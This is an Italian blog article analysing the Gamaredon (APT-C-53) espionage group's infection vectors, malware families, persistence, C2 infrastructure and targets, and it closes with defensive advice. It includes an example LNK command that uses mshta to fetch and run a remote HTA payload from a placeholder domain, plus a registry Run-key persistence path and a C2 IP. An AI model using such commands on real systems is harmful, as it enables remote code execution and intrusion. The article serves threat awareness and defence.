Red Hot Cyber, il blog italiano sulla sicurezza informatica
Red Hot Cyber
La cybersecurity è condivisione. Riconosci il rischio, combattilo, condividi le tue esperienze ed incentiva gli altri a fare meglio di te.
Select language
English Spanish
Cerca
Red Hot Cyber Academy

APT-C-53 (Gamaredon): Analisi delle Attività di Cyber Spionaggio

Sandro Sana : 11 Dicembre 2024 07:10

Il gruppo di Advanced Persistent Threat (APT) APT-C-53, noto anche come Gamaredon, Primitive Bear, Winterflounder e BlueAlpha, è un’entità di cyber spionaggio sponsorizzata dallo stato russo. Attivo dal 2013, è focalizzato su operazioni di intelligence contro organizzazioni governative, enti della difesa, istituzioni diplomatiche e media, con particolare attenzione all’Ucraina. Questo articolo fornisce un’analisi tecnica dettagliata delle metodologie e degli strumenti utilizzati da APT-C-53 nelle operazioni più recenti, facendo riferimento ai dati forniti da diverse fonti di Threat Intelligence, inclusa un’analisi pubblicata su WeChat.

Indice dei contenuti nascondi
1. Tecniche di Attacco e Vettori di Infezione
1.1. 1. File LNK Maligni
1.2. 2. File XHTML Malevoli
1.3. 3. Campagne di Spear-Phishing
2. Strumenti e Malware Impiegati
2.1. 1. Pteranodon
2.2. 2. LitterDrifter
2.3. 3. GammaLoad e GammaSteel
3. Tecniche di Persistenza e Obfuscation
4. Infrastruttura di Comando e Controllo (C2)
5. Settori Colpiti

Tecniche di Attacco e Vettori di Infezione

La mappa delle connessioni riportata nell’immagine evidenzia chiaramente la complessità dell’infrastruttura e delle tattiche impiegate dal gruppo APT-C-53 (Gamaredon). Come mostrato, l’attacco è caratterizzato da una rete intricata di indirizzi IP, domini malevoli e diverse tipologie di file utilizzati per distribuire i payload. Ogni nodo rappresenta un elemento cruciale della catena di infezione, mentre le frecce illustrano le relazioni tra i vari componenti del processo di attacco, dai server di comando e controllo (C2) fino ai file malevoli utilizzati per compromettere i sistemi delle vittime.

L’analisi visiva consente di comprendere come APT-C-53 sfrutti più vettori contemporaneamente per garantire il successo delle sue campagne di cyber spionaggio. Nei paragrafi seguenti, analizzeremo in dettaglio le tecniche di attacco più rilevanti e i vettori di infezione identificati, facendo riferimento ai collegamenti mostrati nell’immagine.

1. File LNK Maligni


CALL FOR SPONSOR - Sponsorizza l'ottavo episodio della serie Betti-RHC

Sei un'azienda innovativa, che crede nella diffusione di concetti attraverso metodi "non convenzionali"? Conosci il nostro corso sul cybersecurity awareness a fumetti? Red Hot Cyber sta ricercando un nuovo sponsor per una nuova puntata del fumetto Betti-RHC mentre il team è impegnato a realizzare 3 nuovi episodi che ci sono stati commissionati.

Contattaci tramite WhatsApp al numero 375 593 1011 per richiedere ulteriori informazioni oppure alla casella di posta [email protected]


Supporta RHC attraverso:
  • L'acquisto del fumetto sul Cybersecurity Awareness
  • Ascoltando i nostri Podcast
  • Seguendo RHC su WhatsApp
  • Seguendo RHC su Telegram
  • Scarica gratuitamente "Dark Mirror", il report sul ransomware di Dark Lab


    • Ti piacciono gli articoli di Red Hot Cyber? Non aspettare oltre, iscriviti alla newsletter settimanale per non perdere nessun articolo.

    APT-C-53 utilizza file di collegamento Windows (LNK) come vettore iniziale di infezione. Questi file contengono comandi che vengono eseguiti tramite processi legittimi come mshta.exe. L’obiettivo è eseguire script remoti dannosi senza destare sospetti. I file LNK sono spesso inseriti in archivi compressi distribuiti tramite email di phishing.

    Esempio di Comando LNK:

    mshta http://malicious-domain/payload.hta

    2. File XHTML Malevoli

    Un altro vettore di attacco comune è l’uso di file XHTML che scaricano e eseguono payload dannosi. Questi file vengono mascherati da documenti legittimi e, una volta aperti, eseguono script che stabiliscono una connessione con un server di comando e controllo (C2) per il download del malware principale.

    Tecnica di Download Dinamico:

    3. Campagne di Spear-Phishing

    APT-C-53 eccelle nelle campagne di spear-phishing mirate. Le email sono personalizzate per ingannare specifici destinatari, spesso utilizzando temi rilevanti per il contesto geopolitico e istituzionale della vittima. Gli allegati includono documenti Office compromessi o archivi compressi contenenti file LNK o script dannosi.

    Strumenti e Malware Impiegati

    1. Pteranodon

    Un trojan modulare utilizzato per ottenere accesso remoto ai sistemi infetti. Consente di eseguire comandi, esfiltrare dati e scaricare ulteriori moduli malevoli.

    Funzionalità principali:

    • Esecuzione di comandi remoti
    • Esfiltrazione di file sensibili
    • Persistenza tramite chiavi di registro

    2. LitterDrifter

    Un worm scritto in VBScript (VBS) progettato per diffondersi tramite unità USB rimovibili. Questo malware sfrutta il trasferimento fisico di dispositivi per penetrare reti isolate.

    Meccanismo di Diffusione:

    • Copia del file VBS nelle unità rimovibili
    • Creazione di file LNK dannosi nella root dell’unità USB
    • Esecuzione automatica tramite modifiche al file autorun.inf

    3. GammaLoad e GammaSteel

    Varianti di malware utilizzate per eseguire il download di ulteriori payload e mantenere il controllo persistente del sistema compromesso. Entrambi i malware sfruttano script PowerShell per comunicare con i server C2 e ricevere comandi dinamici.

    Tecniche di Persistenza e Obfuscation

    APT-C-53 implementa diverse tecniche di persistenza per mantenere l’accesso ai sistemi compromessi:

    1. Modifiche al Registro di Sistema:
      • Esecuzione automatica dei payload malevoli tramite chiavi di registro:
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    2. Obfuscation degli Script:
      • Uso di stringhe codificate in Base64, compressione e tecniche di offuscamento del codice per eludere i sistemi di rilevamento.
    3. Infettare Dispositivi Rimovibili:
      • Propagazione del malware tramite unità USB, facilitando la diffusione in ambienti chiusi o con limitata connettività esterna.

    Infrastruttura di Comando e Controllo (C2)

    L’infrastruttura C2 di APT-C-53 è composta da server che forniscono payload malevoli e ricevono dati esfiltrati. Il gruppo utilizza:

    • Indirizzi IP Dinamici e domini temporanei per evitare il blocco delle comunicazioni.
    • Tecniche di Fast Flux per cambiare frequentemente gli indirizzi IP associati ai domini C2.

    Esempio di IP associato: 5.181.189.32

    Settori Colpiti

    I settori principali presi di mira da APT-C-53 includono:

    • Governo
    • Difesa
    • Diplomazia
    • Media
    • Attivisti e ONG

    APT-C-53 (Gamaredon) rappresenta una delle minacce più persistenti e sofisticate nell’ambito del cyber spionaggio. L’utilizzo di tecniche avanzate di infezione, obfuscation e persistenza sottolinea l’importanza di implementare misure di sicurezza robuste come:

    • Filtri avanzati per email e allegati
    • Monitoraggio delle modifiche al registro di sistema
    • Segmentazione della rete e restrizioni sui dispositivi USB
    • Aggiornamenti costanti dei sistemi di rilevamento delle minacce

    Rimanere aggiornati sulle TTP (Tactics, Techniques, and Procedures) di Gamaredon è essenziale per proteggere le infrastrutture critiche e prevenire potenziali compromissioni.

    Sandro Sana
    Membro del gruppo di Red Hot Cyber Dark Lab e direttore del Red Hot Cyber PodCast. Si occupa d'Information Technology dal 1990 e di Cybersecurity dal 2014 (CEH - CIH - CISSP - CSIRT Manager - CTI Expert), relatore a SMAU 2017 e SMAU 2018, docente SMAU Academy & ITS, membro ISACA. Fa parte del Comitato Scientifico del Competence Center nazionale Cyber 4.0, dove contribuisce all’indirizzo strategico delle attività di ricerca, formazione e innovazione nella cybersecurity.

    Lista degli articoli
    Visita il sito web dell'autore

    Articoli in evidenza

    Il database di PayPal, in vendita con 15,8 milioni di account: cosa c’è da sapere
    Di Redazione RHC - 19/08/2025

    Su un popolare forum dedicato alle fughe di dati è apparso un annuncio pubblicitario per la vendita di un database che presumibilmente contiene 15,8 milioni di account PayPal con indirizzi email ...

    I Criminal Hacker sfruttano Cisco Safe Links per attacchi di phishing
    Di Redazione RHC - 19/08/2025

    Una complessa operazione di attacco è stata individuata recentemente, nella quale gli aggressori digitali utilizzano la struttura di protezione Cisco per eseguire manovre di inganno online. I mal...

    Dark web e hotel italiani: ecco cosa ci ha rivelato MyDocs sui documenti rubati
    Di Luca Stivali - 19/08/2025

    A cura di Luca Stivali e Roland Kapidani. Nel giro di dieci giorni un nickname mai visto prima, mydocs, ha inondato un dark forum con una serie di thread tutti uguali: stesso template, stessa call-to-...

    Non trovi la tua Tesla? Nessun problema: c’è Free TeslaMate
    Di Redazione RHC - 18/08/2025

    Un ricercatore esperto in sicurezza informatica ha scoperto che centinaia di server TeslaMate in tutto il mondo trasmettono apertamente i dati dei veicoli Tesla senza alcuna protezione. Ciò signi...

    Il progetto Dojo di Tesla è morto. Una scommessa tecnologica finita in clamoroso fiasco
    Di Redazione RHC - 18/08/2025

    Il 23 luglio 2025, Tesla tenne la sua conference call sui risultati del secondo trimestre. Elon Musk , come di consueto, trasmise a Wall Street il suo contagioso ottimismo. Parlando di Dojo, il superc...